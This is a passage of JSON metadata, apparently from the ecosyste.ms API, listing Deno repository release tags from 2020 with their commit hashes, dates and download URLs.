sts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05